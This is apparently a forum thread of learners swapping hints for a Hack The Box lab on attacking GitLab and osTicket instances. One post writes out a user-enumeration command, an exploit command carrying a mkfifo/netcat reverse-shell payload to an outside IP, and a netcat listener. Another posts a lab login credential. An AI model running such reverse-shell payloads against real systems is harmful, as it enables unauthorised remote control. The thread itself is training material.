Did you ever find it? I am stuck here as well.
The answers in HTB are case sensitive, so be sure to manually check every found user in GitLab and see the casing that GitLab uses. This subtle detail made me waste a full day on this part.
Thinking out of the box: There’s also a way to get the user without brute force. Register yourself and look around.
Absolutely this. Case sensitive, and you can find out user members a different way. Besides the enum script, it might be faster to use ffuf instead, because the script is pretty much just fuzzing and checking if the page returns 200. It's not the hardest thing to figure out to do instead. For RCE and the password thing, you can also use your own account instead, and I think that's still within scope of what the module is trying to teach.
Friends, maybe it's the same thing that happened to me. I spent a long time trying to do the brute force in many ways and with lists, and in the end the only thing I had to do was restart the machine, maybe because I had not restarted it from the previous session where you do the enumeration, but well, that’s HTB. When I restarted it and did the brute force, I found it after a few seconds.
I still don't understand the osTicket question.
Could the credentials be incorrect?
kgrimes:Ilfreight@access1!
Nvm.
Solved.
The only thing I gained from this section is a decrease in self-esteem.
For those having problems with the osTicket login: it's the set of creds provided in the course material for the kevin user. Just make sure you are using them on the agent login panel.
Attacking Common Applications Attacking GitLab
Find another valid user on the target GitLab instance.
./gitlab_userenum.py --url http://gitlab.inlanefreight.local:8081/ --wordlist /opt/useful/seclists/Usernames/cirt-default-usernames.txt
Gain remote code execution on the GitLab instance. Submit the flag in the directory you land in.
python3 49951.py -t http://gitlab.inlanefreight.local:8081 -u hacker2 -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.15.34 8443 >/tmp/f'
nc -lnvp 8443
Who can help me with this question: Find your way into the osTicket instance and submit the password sent from the Customer Support Agent to the customer Charles Smithson.
This is a time-wasting question. Check the creds given in the section using the OSINT, filter closed tickets, and search for "password" in the ticket name; you’ll find it there.
Just want to post this clarification since it took me way too long to realize… on the GitLab Discovery lab, “example project” means the Inlanefreight Dev project, not Inlanefreight Website.